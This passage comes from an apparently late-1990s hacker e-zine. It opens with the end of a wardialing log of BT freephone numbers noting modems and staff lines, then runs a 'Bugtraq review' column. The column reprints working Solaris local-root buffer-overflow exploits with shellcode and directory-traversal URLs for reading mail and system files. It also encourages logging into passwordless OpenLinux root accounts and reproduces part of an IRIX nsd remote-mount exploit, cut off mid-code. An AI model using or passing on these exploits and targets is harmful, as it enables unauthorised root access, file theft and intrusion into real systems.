  2409.                  Somhow the line is held open]
  2410. ************************************************************************
  2411. 0800 672 782    [not rec]
  2412. 0800 672 783    [no answer]
  2413. 0800 672 784    [no answer]
  2414. 0800 672 785    [no answer]
  2415. 0800 672 786    [no answer]
  2416. 0800 672 787    [no answer]
  2417. 0800 672 788    [no answer]
  2418. 0800 672 789    [no answer]
  2419. 0800 672 790    [BT residential customer accounts service]
  2420. 0800 672 791    [answerphone]
  2421. 0800 672 792    [answerphone]
  2422. 0800 672 793    [no answer]
  2423. 0800 672 794    [no answer]
  2424. 0800 672 795    [answerphone]
  2425. 0800 672 796    [no answer]
  2426. 0800 672 797    [no answer]
  2427. 0800 672 798    [BT fax service. Meridian switch]
  2428. 0800 672 799    [BT fax sercvie]
  2429. 0800 672 800    [busy]
  2430. 0800 672 801    [dead]
  2431. 0800 672 802    [dead]
  2432. 0800 672 803    [dead]
  2433. 0800 672 804    [dead]
  2434. 0800 672 805    [dead]
  2435. 0800 672 806    [dead]
  2436. 0800 672 807    [dead]
  2437. 0800 672 808    [dead]
  2438. 0800 672 809    [dead]
  2439. 0800 672 810    [southapton buisness center]
  2440. 0800 672 811    [BT corperate clients]
  2441. 0800 672 812    [horsham center]
  2442. 0800 672 813    [no answer]
  2443. 0800 672 814    [no answer]
  2444. 0800 672 815    [horsham buisness center]
  2445. 0800 672 816    [no answer]
  2446. 0800 672 817    [horsham center]
  2447. 0800 672 818    [no answer]
  2448. 0800 672 819    [no answer]
  2449. 0800 672 820    [no answer]
  2450. 0800 672 821    [no answer]
  2451. 0800 672 822    [horsham center]
  2452. 0800 672 823    [no answer]
  2453. 0800 672 824    [no answer]
  2454. 0800 672 825    [BT service center]
  2455. 0800 672 826    [BT buisness center]
  2456. 0800 672 827    [carrier]                   
  2457. 0800 672 828    [not recognised]
  2458. 0800 672 829    [no answer]
  2459. 0800 672 830    [BT residential repair service]
  2460. 0800 672 831    [dead]
  2461. 0800 672 832    [dead]
  2462. 0800 672 833    [dead]
  2463. 0800 672 834    [dead]
  2464. 0800 672 835    [no answer]
  2465. 0800 672 836    [no answer]
  2466. 0800 672 837    [no answer]
  2467. 0800 672 838    [hello]
  2468. 0800 672 839    [no answer]
  2469. 0800 672 840    [6777 robert speaking]
  2470. 0800 672 841    [no answer]
  2471. 0800 672 842    [network managemnt center]
  2472. 0800 672 843    [no answer]
  2473. 0800 672 844    [dead]
  2474. 0800 672 845    [BT voice-messaging]
  2475. 0800 672 846    [BT voice-messaging]
  2476. 0800 672 847    [no answer]
  2477. 0800 672 848    [no answer]
  2478. 0800 672 849    [no answer]
  2479. 0800 672 850    [can i have the number you are reporting please?]
  2480. 0800 672 851    [dead]
  2481. 0800 672 852    [dead]
  2482. 0800 672 853    [dead]
  2483. 0800 672 854    [dead]
  2484. 0800 672 855    [no answer]
  2485. 0800 672 856    [nothing, then dead]
  2486. 0800 672 857    [modem]
  2487. 0800 672 858    [dead]
  2488. 0800 672 859    [dead]
  2489. 0800 672 860    [dead]
  2490. 0800 672 861    [strange, internal dead tone]
  2491. 0800 672 862    [not available]
  2492. 0800 672 863    [hallo]
  2493. 0800 672 864    [no answer]
  2494. 0800 672 865    [modem]
  2495. 0800 672 866    [no answer]
  2496. 0800 672 867    [dead]
  2497. 0800 672 868    [dead]
  2498. 0800 672 869    [no answer]
  2499. 0800 672 870    [telecom red sales desk]
  2500. 0800 672 871    ["]
  2501. 0800 672 872    ["]
  2502. 0800 672 873    ["]
  2503. 0800 672 874    ["]
  2504. 0800 672 875    ["]
  2505. 0800 672 876    ["]
  2506. 0800 672 877    ["]
  2507. 0800 672 878    ["]
  2508. 0800 672 879    ["]
  2509. 0800 672 880    [dead]
  2510. 0800 672 881    [somthing buisness center]
  2511. 0800 672 882    ["]
  2512. 0800 672 883    ["]
  2513. 0800 672 884    ["]
  2514. 0800 672 885    [dead]
  2515. 0800 672 886    [?]
  2516. 0800 672 887    [modem]
  2517. 0800 672 888    [dead]
  2518. 0800 672 889    [dead]
  2519. 0800 672 890    [dead]
  2520. 0800 672 891    [no answer]
  2521. 0800 672 892    [answerphone]
  2522. 0800 672 893    [BT fax - BT-3]
  2523. 0800 672 894    [answerphone]
  2524. 0800 672 895    [answerphone]
  2525. 0800 672 896    [answerphone]
  2526. 0800 672 897    [BT fax service center]
  2527. 0800 672 898    [This system will connect you to a BT office of your choice]
  2528. 0800 672 899    [modem]
  2529. 0800 672 900    [telecom red]
  2530. 0800 672 901    ["]
  2531. 0800 672 902    ["]
  2532. 0800 672 903    ["]
  2533. 0800 672 904    ["]
  2534. 0800 672 905    ["]
  2535. 0800 672 906    ["]
  2536. 0800 672 907    ["]
  2537. 0800 672 908    ["]
  2538. 0800 672 909    ["]
  2539. 0800 672 910    [business solutions]
  2540. 0800 672 911    [no answer]
  2541. 0800 672 912    [no answer]
  2542. 0800 672 913    [no answer]
  2543. 0800 672 914    [no answer]
  2544. 0800 672 915    [no answer]
  2545. 0800 672 916    [no answer]
  2546. 0800 672 917    [no answer]
  2547. 0800 672 918    [no answer]
  2548. 0800 672 919    [no answer]
  2549. 0800 672 920    [no answer]
  2550. 0800 672 921    [query line]
  2551. 0800 672 922    [no answer]
  2552. 0800 672 923    [no answer]
  2553. 0800 672 924    [no answer]
  2554. 0800 672 925    [no answer]
  2555. 0800 672 926    [no answer]
  2556. 0800 672 927    [no answer]
  2557. 0800 672 928    [no answer]
  2558. 0800 672 929    [no answer]
  2559. 0800 672 930    [dead]
  2560. 0800 672 931    [no answer]
  2561. 0800 672 932    [dead]
  2562. 0800 672 933    [not recoginised]
  2563. 0800 672 934    [hello, it's john]
  2564. 0800 672 935    [no answer]
  2565. 0800 672 936    [no answer]
  2566. 0800 672 937    [southampton business center]
  2567. 0800 672 938    [no answer]
  2568. 0800 672 939    [no answer]
  2569. 0800 672 940    [dead]
  2570. 0800 672 941    [dead]
  2571. 0800 672 942    [dead]
  2572. 0800 672 943    [dead]
  2573. 0800 672 944    [dead]
  2574. 0800 672 945    [dead]
  2575. 0800 672 946    [dead]
  2576. 0800 672 947    [dead]
  2577. 0800 672 948    [dead]
  2578. 0800 672 949    [dead]
  2579. 0800 672 950    [dead]
  2580. 0800 672 951    [modem]
  2581. 0800 672 952    [no answer]
  2582. 0800 672 953    [modem]
  2583. 0800 672 954    [no answer]
  2584. 0800 672 955    [modem]
  2585. 0800 672 956    [no answer]
  2586. 0800 672 957    [modem]
  2587. 0800 672 958    [no answer]
  2588. 0800 672 959    [no answer]
  2589. 0800 672 960    [no answer]
  2590. 0800 672 961    [BT work manager center]
  2591. 0800 672 962    [no answer]
  2592. 0800 672 963    [BT workmanager center]
  2593. 0800 672 964    [no answer]
  2594. 0800 672 965    [BT workmanager center]
  2595. 0800 672 966    ["]
  2596. 0800 672 967    [no answer]
  2597. 0800 672 968    [no answer]
  2598. 0800 672 969    [no answer]
  2599. 0800 672 970    [dead]
  2600. 0800 672 971    [no answer]
  2601. 0800 672 972    [no answer]
  2602. 0800 672 973    [no answer]
  2603. 0800 672 974    [no answer]
  2604. 0800 672 975    [no answer]
  2605. 0800 672 976    [no answer]
  2606. 0800 672 977    [no answer]
  2607. 0800 672 978    [no answer]
  2608. 0800 672 979    [no answer]
  2609. 0800 672 980    [no answer]
  2610. 0800 672 981    [no answer]
  2611. 0800 672 982    [no answer]
  2612. 0800 672 983    [no answer]
  2613. 0800 672 984    [dead]
  2614. 0800 672 985    [Meridian mail]
  2615. 0800 672 986    [no answer]
  2616. 0800 672 987    [no answer]
  2617. 0800 672 988    [no answer]
  2618. 0800 672 989    [dead]
  2619. 0800 672 990    [no answer]
  2620. 0800 672 991    [modem]
  2621. 0800 672 992    [dead]
  2622. 0800 672 993    [not recognised]
  2623. 0800 672 994    [no answer]
  2624. 0800 672 995    [no answer]
  2625. 0800 672 996    [no answer]
  2626. 0800 672 997    [no answer]
  2627. 0800 672 998    [no answer]
  2628. 0800 672 999    [no answer]
  2629. **********
  2630.  
  2631.  
  2632. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2633. -->]OO[:[ SUIDcyde ]:::::::::::::[OO--[ by bodie ]---[ bodi3@usa.net ]:::::::
  2634. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2635.  
  2636. Bugtraq review
  2637. ---------
  2638. *NOTE*
  2639. all these bugs have not been varified by me, use them at your own risk
  2640. ---------
  2641. been an interesting time recently on bugtraq.  A was found in IE4 which means
  2642. that if someone tries to bookmark your site, they will not be able to access
  2643. their browser any more
  2644.  
  2645. The bug works because IE5 tries to download a file called favicon.ico from
  2646. the a web site when a user bookmarks it.  It uses this icon to display next
  2647. to the site in the faverites list.  The bug works when the file isn't of the
  2648. correct format, IE5 crashes :)
  2649.  
  2650. This means you can stop all those script kiddies from bookmarking your site
  2651. by putting a file called favicon.ico (just open up a t-file and write hello
  2652. or something) This will encourage some people to use netscape and generally
  2653. piss off microshaft.  And the best part is, it's totally legal :)
  2654. ---
  2655.  
  2656. Another bug that was revealed was in the installation program for openlinux
  2657. 2.2.  The problem lies in that, when it installs it inserts a user in the
  2658. password file called 'help'. This account is meant to be used to rescue the
  2659. system if it crashes during installation. Why they don't just use root i
  2660. don't know, but the account stays there after installation with root privs
  2661. and no password.  So if ya see any OL systems around try that out.  I've
  2662. seen 1 so far and it worked like a dream (of course i notified the sysadmin
  2663. of it straight away :))
  2664. ---
  2665.  
  2666. Yet more buffer overflows, this one for dtprintinfo, root.  This exploit code
  2667. works on Intel edition of Solaris2.6 and Solaris 2.7, you may have to fiddle
  2668. with the code to get it working on other versions.  To get it working you
  2669. will have to type this first
  2670.  
  2671. /*========================================================================
  2672.    ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
  2673.    The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
  2674.    Written by UNYUN (unewn4th@usa.net)
  2675.   ========================================================================
  2676. */
  2677. static char             x[1000];
  2678. #define ADJUST          0
  2679. #define STARTADR        621
  2680. #define BUFSIZE         900
  2681. #define NOP             0x90
  2682. unsigned long ret_adr;
  2683. int     i;
  2684. char exploit_code[] =
  2685. "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  2686. "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  2687. "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  2688. "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
  2689. "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
  2690. "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
  2691. "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
  2692. "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
  2693. "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
  2694. "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
  2695.  
  2696. unsigned long get_sp(void)
  2697. {
  2698.   __asm__(" movl %esp,%eax ");
  2699. }
  2700. main()
  2701. {
  2702.         putenv("LANG=");
  2703.         for (i=0;i<BUFSIZE;i++) x[i]=NOP;
  2704.         for (i=0;i<strlen(exploit_code);i++)
  2705.                 x[STARTADR+i]=exploit_code[i];
  2706.         ret_adr=get_sp() - 1292 + 148;
  2707.         for (i = ADJUST; i < 400 ; i+=4){
  2708.                 x[i+0]=ret_adr & 0xff;
  2709.                 x[i+1]=(ret_adr >> 8 ) &0xff;
  2710.                 x[i+2]=(ret_adr >> 16 ) &0xff;
  2711.                 x[i+3]=(ret_adr >> 24 ) &0xff;
  2712.         }
  2713.         x[BUFSIZE]=0;
  2714.         execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
  2715.         "-p",x,(char *) 0);
  2716. }
  2717.  
  2718. ---
  2719.  
  2720. another exploit is in the lpset command.  This goes sorta like this
  2721.  
  2722. /*===================================================================
  2723.    ex_lpset.c Overflow Exploits( for Intel Edition )
  2724.    The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
  2725.    Written by UNYUN (unewn4th@usa.net)
  2726.  =====================================================================
  2727. */
  2728. #define OFFSET      0x3b88
  2729. #define STARTADR    700
  2730. #define ENDADR      1200
  2731. #define EX_STADR    8000
  2732. #define BUFSIZE     22000
  2733. #define NOP 0x90
  2734.  
  2735. unsigned long ret_adr;
  2736. int i,adjust;
  2737.  
  2738. char exploit_code[] =
  2739. "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
  2740. "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55"
  2741.  
  2742. "\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0"
  2743. "\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e"
  2744. "\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3"
  2745. "\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08"
  2746. "\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8"
  2747. "\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
  2748.  
  2749. unsigned long get_sp(void)
  2750. {
  2751.   __asm__(" movl %esp,%eax ");
  2752. }
  2753.  
  2754. static char   x[BUFSIZE];
  2755.  
  2756. main(int argc, char **argv)
  2757. {
  2758.         memset(x,NOP,18000);
  2759.         ret_adr=get_sp()-OFFSET;
  2760.         printf("0 : x86 Solaris2.6 J\n1 : ?\n2 : ?\n3 : x86 Solaris 7 J\n");
  2761.         printf("Input (0-3) : "); scanf("%d",&adjust);
  2762.         printf("Jumping Address = 0x%lx\n",ret_adr);
  2763.         for (i = adjust+STARTADR; i<ENDADR ; i+=4){
  2764.                 x[i+2]=ret_adr & 0xff;
  2765.                 x[i+3]=(ret_adr >> 8 ) &0xff;
  2766.                 x[i+0]=(ret_adr >> 16 ) &0xff;
  2767.                 x[i+1]=(ret_adr >> 24 ) &0xff;
  2768.         }
  2769.         for (i=0;i<strlen(exploit_code);i++)
  2770.                 x[i+EX_STADR]=exploit_code[i];
  2771.         x[5000]='=';
  2772.         x[18000]=0;
  2773.         execl("/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0);
  2774. }
  2775.  
  2776. ---
  2777.  
  2778. Next up we have more problems with sshd.  This one allows you to try to brute
  2779. force logins to a shell without being detected.  Normally you are given 3
  2780. attemps to log into an account before you will be disconnected, your IP
  2781. logged and e-mail sent to the feds and your ISP. But, if you disconnect after
  2782. only 2 attemps, the IP is not logged. If ya ask me brute force on a remote
  2783. host is pretty shite to say the least but this is how to do it if ya do wanna
  2784. try it
  2785. ---
  2786.  
  2787. A rather nasty vulnerability lies in a program called midikeys, this is a
  2788. popular program installed by a lot of sysadmins to play midi files.
  2789. Unfortunately it's suid root ...ohh dear... Set your machine as a x-host for
  2790. the machine your trying to hack.  Now load up midikeys with the display set
  2791. to your machine, try to open a text file.  Midikeys will be very friendly and
  2792. open up a text editor for you which can open any file on the remote system.
  2793. ---
  2794.  
  2795. Solaris 2.6 and 2.7 have a local root but in libc.  Goes something like this
  2796. /*============================================================
  2797.    ex_lobc.c Overflow Exploits( for Sparc Edition)
  2798.    The Shadow Penguin Security
  2799.    (http://base.oc.to:/skyscraper/byte/551)
  2800.    Written by UNYUN (unewn4th@usa.net)
  2801.   ============================================================
  2802. */
  2803. #define EV          "LC_MESSAGES="
  2804. #define ADJUST      0
  2805. #define OFFSET      5392
  2806. #define STARTADR    400
  2807. #define NOP         0xa61cc013
  2808. #define RETS        600
  2809.  
  2810. char    x[80000];
  2811.  
  2812. char exploit_code[] =
  2813. "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  2814. "\x2b\x0b\xda\xdc\xae\x15\x63\x68"
  2815. "\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
  2816. "\x94\x10\x20\x10\x94\x22\xa0\x10"
  2817. "\x9c\x03\xa0\x14"
  2818. "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  2819. "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
  2820. "\x91\xd0\x20\x08"
  2821. ;
  2822.  
  2823. unsigned long get_sp(void)
  2824. {
  2825. __asm__("mov %sp,%i0 \n");
  2826. }
  2827.  
  2828. int i;
  2829. unsigned int ret_adr;
  2830.  
  2831. main()
  2832. {
  2833.     putenv("LANG=");
  2834.     memset(x,'x',70000);
  2835.  
  2836.     for (i = 0; i < ADJUST; i++) x[i]=0x40;
  2837.     for (i = ADJUST; i < 1000; i+=4){
  2838.         x[i+3]=NOP & 0xff;
  2839.         x[i+2]=(NOP >> 8 ) &0xff;
  2840.         x[i+1]=(NOP >> 16 ) &0xff;
  2841.         x[i+0]=(NOP >> 24 ) &0xff;
  2842.     }
  2843.     for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
  2844.     ret_adr=get_sp()-OFFSET;
  2845.     printf("jumping address : %lx\n",ret_adr);
  2846.     if ((ret_adr & 0xff) ==0 ){
  2847.         ret_adr -=16;
  2848.         printf("New jumping address : %lx\n",ret_adr);
  2849.     }
  2850.     for (i = ADJUST+RETS; i < RETS+600; i+=4){
  2851.         x[i+3]=ret_adr & 0xff;
  2852.         x[i+2]=(ret_adr >> 8 ) &0xff;
  2853.         x[i+1]=(ret_adr >> 16 ) &0xff;
  2854.         x[i+0]=(ret_adr >> 24 ) &0xff;
  2855.     }
  2856.     memcpy(x,EV,strlen(EV));
  2857.     x[3000]=0;
  2858.     putenv(x);
  2859.     execl("/bin/passwd","passwd",(char *)0);
  2860. }
  2861. ---
  2862.  
  2863. A lot of mail servers are now implementing web interfaces.  This can be a
  2864. problem whe usuffer holes like this.  The following programs have these
  2865. problems:
  2866.  
  2867. CTMail: 
  2868. type:
  2869. http://[server]:8002/../spool/username/mail.txt 
  2870. into your web browser and you can view the mail of the user
  2871.  
  2872. FTGate:
  2873. same as above except this seems to be a bit more reliable than the CTMail bug
  2874.  
  2875. NTMail:
  2876. This is even worse, it allows you to view any file on the system.  Type:
  2877. http://[server]:8000/../../../../../boot.ini.
  2878. and your looking at boot.ini
  2879.  
  2880. I'm sure u'll find nice ways of exploiting these bugs
  2881. ---
  2882.  
  2883. Yet more problems with IRIX comes in the nsd virtual file system.  This
  2884. allows local users to exploit root.  Code coming: (sorry about the extended
  2885. coments but i decided to include out of respect to the authour)
  2886.  
  2887. /******************************************************************************
  2888.  
  2889. IRIX 6.5 nsd virtual filesystem exploit
  2890.  
  2891. Author: Jefferson Ogata (JO317) <ogata@pobox.com>
  2892.  
  2893. Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
  2894. of this program constitutes your complete acceptance of all liability for
  2895. any damage or loss caused by the aforesaid use. It is provided to the
  2896. network community solely to document the existence of a vulnerability
  2897. in the security implementations of certain versions of IRIX, and may not
  2898. be used for any illicit purpose. Many of the details of the bug this
  2899. program exploits have been available to users of SGI's online support
  2900. system since February 1999. The current revision of IRIX (6.5.3) corrects
  2901. this bug, at least enough to stop this particular exploit, and I strongly
  2902. encourage you to bring your systems up to date as quickly as possible.
  2903.  
  2904. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
  2905. lookups into a userland process called nsd, which exports the results of
  2906. the queries it fields into a virtual filesystem. The virtual filesystem is
  2907. normally mounted onto the directory /ns by the program /sbin/nsmount, which
  2908. is invoked by nsd on startup. The nsd daemon itself is exporting the
  2909. filesystem via NFS3 over a dynamically bound UDP port -- rather than a
  2910. well-known or settable one -- typically in the 1024-1029 range. On a
  2911. desktop system, 1024 is a good bet, since nsd is usually the first
  2912. RPC/UDP service to be started.
  2913.  
  2914. The NFS filesystem is not registered with mountd, so there is no way to
  2915. query mountd for a mount filehandle. But because the NFS port is fairly
  2916. easy to discover through port scanning, and because the mount filehandle
  2917. nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
  2918. filesystem from a host anywhere on the Internet. nsd will serve an array
  2919. of NFS requests to anyone. Furthermore, because the service's NFS port is
  2920. bound dynamically, it is difficult to protect it with a firewall; it may
  2921. change from one system start to another, or if the daemon is killed and
  2922. restarted.
  2923.  
  2924. This program can successfully mount the nsd-exported virtual filesystem
  2925. from a remote host onto a machine running IRIX 6.4 or higher. It makes use
  2926. of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
  2927. what this flag does at the NFS protocol level, but it allows the client to
  2928. ask the NFS server not to enforce certain permissions controls against the
  2929. client. I don't know whether any other vendor NFS client systems support
  2930. this flag. A clever person might write a userland NFS client that would
  2931. accept an initial handle, NFS port, etc. as arguments.
  2932.  
  2933. On an SGI with SGI C compiler, compile with:
  2934.  
  2935.     cc -o nsdadv nsdadv.c
  2936.  
  2937. Run it this way:
  2938.  
  2939.     nsdadv /mnt sucker.example.com 1024
  2940.  
  2941. with obvious substitutions.
  2942.  
  2943. So what are the security implications of this? Well, at the very least, the
  2944. nsd filesystem on an NIS server reveals the NIS domain name, and what maps
  2945. it contains, as well as what classes are being used.
  2946.  
  2947. By exploring the filesystem shortly after it has been mounted I have been
  2948. able to retrieve data that should be hidden from me, including shadow
  2949. password entries from a remote system's shadow file.
  2950.  
  2951. Beyond retrieving keys and maps, you can also monitor the filesystem for
  2952. changes. A great deal of information is leaked through the contents of the
  2953. nsd filesystem. For example, if host A looks up a host B's IP address, a
  2954. file named B will appear in the /.local/hosts.byname directory in A's nsd
  2955. filesystem. The file's contents will be the IP address.
  2956.  
  2957. By the way, though you be unable to chdir into a particular location in
  2958. the nsd filesystem, you may yet succeed under slightly different
  2959. conditions. Eventually you can do it. I'm not sure why or when, but nsd
  2960. gets picky sometimes. Eventually it relents. Specifically, I've found that
  2961. the entire nsd filesystem appears readable for a few seconds after it is
  2962. initially mounted. If you can't look at something, unmount the filesystem,
  2963. remount it, and try again immediately. It also seems that a stat() is
  2964. sometimes required before a chdir(). Your mileage may vary, but keep
  2965. trying. You may wish to write a script to mount the nsd filesystem, explore
  2966. and take inventory of its contents, and unmount the filesystem quickly.
  2967.  
  2968. Once you've chdir'd into a directory, it appears you can always read it,
  2969. although you can't necessarily stat its contents. This suggests a strategy
  2970. of spawning a group of processes each with its cwd set to a subdirectory of
  2971. the nsd filesystem, in order to retain visibility on the entire filesystem.
  2972. Each process would generate an inventory of its cwd, and then monitor it
  2973. for changes. A Perl script could do this well.
  2974.  
  2975. Another thing: it is possible to create an empty file in nsd's exported
  2976. filesystem simply by stat()ing a nonexistent filename. This suggests a
  2977. potential DoS by creating many files in a directory.
  2978.  
  2979. Remember that the system keeps a local cache in /var/ns, so you may have
  2980. to wait for cached entries on the target host to expire before you'll see
  2981. them reappear in the virtual filesystem.
  2982.  
  2983. For some fairly extensive info on the nsd implementation, take a look at:
  2984.  
  2985.     http://www.bitmover.com/lm/lamed_arch.html
  2986.  
  2987. ******
  2988.  
  2989. What got me into all this was that I found I could no longer run services
  2990. chrooted if they required DNS. It took considerable effort to come up with
  2991. a solution to this. This was a fundamental change from IRIX 6.4, and I know
  2992. I'm not the only one who finds the nsd implementation to be a generally
  2993. unpleasant direction, in part because it causes umount -t nfs to break
  2994. system database services. I give SGI points for creativity -- in one sense,
  2995. using NFS as a database access system is a very slick approach. But the
  2996. database needs a security model, and the model needs to be implemented
  2997. correctly. Neither of these needs appears to have been met.
  2998.  
  2999. So how could SGI fix this?
  3000.  
  3001. Without going back, SGI could at least make nsd respond only to queries
  3002. from localhost (see note below about IRIX 6.5.3). The problem here is that
  3003. they actually intend to support remote mounts in later releases, in order
  3004. to supplement or supplant other means of distribution. The web documents
  3005. indicate this.
  3006.  
  3007. They could create a well-randomized mount filehandle for the filesystem
  3008. and pass that to nsmount. Then you couldn't remotely mount the filesystem
  3009. without guessing the handle -- nontrivial with a 32-byte handle.
  3010.  
  3011. At the very least, they should provide libraries of regular BIND resolver
  3012. routines, file-based getpwent, etc. routines, so one could choose the
  3013. resolution strategy at link time, perhaps by modifying the shared library
  3014. path.
  3015.  
  3016. ******
  3017.  
  3018. With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
  3019. to some degree. The exploit does not appear to work as it does against
  3020. 6.5.2. Further testing is needed, and the behavior should be watched
  3021. carefully in future versions of IRIX.
  3022.  
  3023. ****************************************************************************/
  3024.  
  3025. #include <stdio.h>
  3026. #include <string.h>
  3027. #include <malloc.h>
  3028. #include <mntent.h>
  3029. #include <sys/types.h>
  3030. #include <rpc/types.h>
  3031. #include <sys/fstyp.h>
  3032. #include <sys/fsid.h>
  3033. #include <sys/mount.h>
  3034. #include <sys/fs/nfs.h>
  3035. #include <sys/fs/nfs_clnt.h>
  3036. #include <netinet/in.h>
  3037. #include <netdb.h>
  3038. #include <arpa/inet.h>
  3039.  
  3040. /* Filesystem type name for nsd-exported filesystem. */
  3041. #define NSD_FSTYPE      "nfs3"
  3042.  
  3043. /* File the records mounted filesystems. */
  3044. #define MTAB_FILE       "/etc/mtab"
  3045.  
  3046. /* Socket address we'll fill in with our destination IP and port. */
  3047. struct sockaddr_in sin;
  3048.  
  3049. /* All zero file handle. This appears to be the base handle for the nsd
  3050.    filesystem. Great security, huh? */
  3051. unsigned char fh[NFS_FHSIZE] = { 0 };
  3052.  
  3053. /* NFS mount options structure to pass to mount(2). The meanings of these
  3054.    are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
  3055.    flags field indicates that this is a soft mount without log messages,
  3056.    and to set the initial timeout and number of retries from fields in
  3057.    this structure. The fh field is a pointer to the filehandle of the
  3058.    mount point, whose size is set by fh_len. As noted above, the mount
  3059.    point filehandle is just 32 zeroes. */
  3060. struct nfs_args nx =
  3061. {
  3062.     &sin,               /* addr */
  3063.     (fhandle_t *) fh,   /* fh */
  3064.     NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC,        /* flags */
  3065.     0,                  /* wsize */
  3066.     0,                  /* rsize */
  3067.     100,                /* timeo */
  3068.     2,                  /* retrans */
  3069.     0,                  /* hostname */
  3070.     0,                  /* acregmin */
  3071.     0,                  /* acregmax */
  3072.     0,                  /* acdirmin */
  3073.     0,                  /* acdirmax */
  3074.     0,                  /* symttl */
  3075.  
  3076.     { 0 },              /* base */
  3077.  
  3078.     0,                  /* namemax */
  3079.     NFS_FHSIZE,         /* fh_len */
  3080.     /* On IRIX 6.4 and up there are also the following... */
  3081.                         /* bdsauto */
  3082.                         /* bdswindow */
  3083.     /* On IRIX 6.5 there are also the following... */
  3084.                         /* bdsbuflen */
  3085.                         /* pid */
  3086.                         /* maxthreads */
  3087. };
  3088.  
  3089. void usage (void)
  3090. {
  3091.     fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
  3092.     fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
  3093.     fprintf (stderr, "port <port> onto <directory>.\n\n");
  3094.     exit (1);
  3095. }
  3096.  
  3097. int main (int argc, char **argv)
  3098. {
  3099.     char                *dir;
  3100.     char                *host;
  3101.     char                *ports;
  3102.     int                 port;
  3103.     struct hostent      *h;
  3104.     int                 fstype;
  3105.     FILE                *mtabf;
  3106.     struct mntent       mnt =
  3107.     {
  3108.         0,
  3109.         0,
  3110.         NSD_FSTYPE,
  3111.         "soft,timeo=100,retrans=2",
  3112.         0,
  3113.         0,
  3114.     };
  3115.  
  3116.     if (argc != 4)
  3117.         usage ();
  3118.  
  3119.     dir = argv[1];
  3120.     host = argv[2];
  3121.     port = atoi ((ports = argv[3]));
  3122.  
  3123.     /* Prepare for host lookup. */
  3124.     memset ((void *) &sin, 0, sizeof (sin));
  3125.     sin.sin_family = 2;
  3126.     sin.sin_port = port;
  3127.  
  3128.     /* Look up the host. */
  3129.     if (inet_aton (host, &sin.sin_addr))
  3130.         ;
  3131.     else if ((h = gethostbyname (host)))
  3132.     {
  3133.         unsigned long   *l = (unsigned long *) *(h->h_addr_list);
  3134.         sin.sin_addr.s_addr = l[0];
  3135.     }
  3136.     else
  3137.     {
  3138.         fprintf (stderr, "Cannot resolve host %s.\n", host);
  3139.         return 1;
  3140.     }
  3141.  
  3142.     /* Get filesystem type index for nsd filesystem type. */
  3143.     if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
  3144.     {
  3145.         perror ("sysfs (" NSD_FSTYPE ")");
  3146.         return 1;
  3147.     }
  3148.  
  3149.     fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
  3150.         host, inet_ntoa (sin.sin_addr), port, dir);
  3151.  
  3152.     /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
  3153.        means "tell server to trust us with attributes" and MS_DATA means
  3154.        "6-argument mount".
  3155.  
  3156.        MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
  3157.        seem to work without this option. So even though this program will
  3158.        compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
  3159.        attack nsd. */
